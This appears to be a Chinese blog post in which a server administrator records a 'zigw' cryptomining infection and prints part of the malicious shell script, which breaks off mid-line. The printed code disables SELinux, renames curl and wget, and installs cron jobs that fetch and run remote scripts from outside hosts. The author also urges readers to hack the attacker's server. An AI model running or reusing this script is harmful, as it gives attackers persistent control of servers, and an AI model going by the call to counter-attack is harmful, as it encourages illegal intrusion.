关于此病毒的参考文献:
https://4hou.win/wordpress/?spm=a2c4e.11153940.blogcont657476.14.53ff2757GtnJxj&cat=6270
病毒介绍
https://yq.aliyun.com/articles/657476
病毒清理,不过有时会复发
https://blog.csdn.net/sayWhat_sayHello/article/details/83988443
病毒清理,理论上已经解决复发问题
如图,服务器已被 zigw 挖矿病毒入侵,记录进程PID 93724
首先 cat /var/spool/mail/root,发现在 10:26:03 秒利用 curl 下载了一个sh并执行
下载地址为 140.143.35.89:43768/shz.sh (曝光IP,希望有大牛黑入或攻击可恶的挖矿病毒服务器)
下面是下载下来的shell代码:
#!/bin/sh
setenforce 0 2>dev/null
echo SELINUX=desabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
crondir='/var/spool/cron/'"$USER"
cont=`cat ${
crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/gmbpr2
rtdir="/etc/gmbpr2"
oddir="/etc/gmbpr"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/url"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/get"
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/curl /usr/bin/url
if [ -f "$oddir" ]
then
pkill zjgw
chattr -i /etc/gmbpr
rm -f /etc/gmbpr
else
echo "ok"
fi
chattr -ia /var/spool/cron
chattr -ia /var/spool/cron/root
if [ -f "$bbdir" ]
then
[[ $cont =~ "shz.sh" ]] || echo "*/12 * * * * curl -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir}
[[ $cont =~ "shz.sh" ]] || echo "*/30 * * * * curl -fsSL http://c.21-3n.xyz:43768/bak.sh | sh" >> ${crondir}
else
[[ $cont =~ "shz.sh" ]] || echo "*/15 * * * * url -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir}
[[ $cont =~ "shz.sh" ]] || echo "*/30 * * * * url -fsSL http://c.21-3n.xyz:43768/bak.sh | sh" >> ${crondir}
fi
asd=`cat /var/spool/cron/root`
if [ -f "$bbdir" ]
then
[[ $asd =~
版权声明:本文为guanzhengyinqin原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。